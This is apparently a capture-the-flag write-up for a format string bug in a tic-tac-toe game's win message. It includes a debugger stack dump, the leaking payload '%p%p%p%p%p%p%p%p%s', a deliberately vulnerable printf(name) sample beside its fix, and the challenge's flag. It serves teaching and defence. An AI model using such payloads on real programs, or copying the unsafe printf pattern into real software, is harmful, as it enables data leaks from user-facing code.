## Difficulty

50/100 | MEDIUM

Simple format string attack; this is not groundbreaking stuff.

## Category

Exploitation

## How To Solve

There is a format string vulnerability in the `print_win_message` function.

The name the user inputs at the beginning of the game is printed here using `printf` without any validation, i.e. the name itself is used as the format string. This means we can leak data from the stack, and it also happens that the flag is on the stack.

To leak the flag we are going to use the `%s` format string specifier. The problem is that there are a couple of values on the stack before the flag; for example, the stack looks like this right before the `printf` call:

```
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
```

So we need to pop off three 64-bit values before we reach the flag, which means we would need the payload `%p%p%p%s`. This would work on a 32-bit machine, but since this is a 64-bit binary, the first 6 arguments are passed via registers (System V x86-64 calling convention). This means we need to "pop off" an additional 5 arguments (the first argument is the format string itself, so only 5 of the register slots hold varargs), giving us the final payload string:

`%p%p%p%p%p%p%p%p%s`

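As an added illustration (not code from the challenge binary or from the original writeup), here is a hypothetical reconstruction of the vulnerable `print_win_message` pattern next to its hardened form, plus a buffer-rendering helper and an input-side check; every function name other than `print_win_message` is assumed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the bug class described above: the
 * player's name is handed to printf as the format string, so a name such
 * as "%p%p%p%p%p%p%p%p%s" walks the vararg registers and then the stack. */
void print_win_message_vulnerable(const char *name)
{
    printf(name);          /* gcc -Wformat-security flags this line */
    printf(" wins!\n");
}

/* Hardened form: the format string is a compile-time literal and the
 * untrusted name is passed as a plain %s argument, so '%' in the name
 * is printed literally and never interpreted. */
void print_win_message_fixed(const char *name)
{
    printf("%s wins!\n", name);
}

/* Same hardened pattern rendered into a buffer so the result can be
 * inspected without touching stdout. Returns what snprintf returns. */
int render_win_message(const char *name, char *out, size_t out_len)
{
    return snprintf(out, out_len, "%s wins!", name);
}

/* Returns 1 if the hardened rendering of `name` equals `expected`. */
int fixed_message_matches(const char *name, const char *expected)
{
    char buf[128];
    render_win_message(name, buf, sizeof buf);
    return strcmp(buf, expected) == 0;
}

/* Input-side defence in depth: count '%' characters in a name so a
 * logging or UI path you have not audited can reject or escape it. */
int count_format_chars(const char *name)
{
    int n = 0;
    for (; *name; name++)
        if (*name == '%')
            n++;
    return n;
}
```

Compiling with `-Wformat-security` (and `-Werror=format-security` in CI) turns the vulnerable call into a build failure, which is the cheapest detection for this bug class.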
## Flag

IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}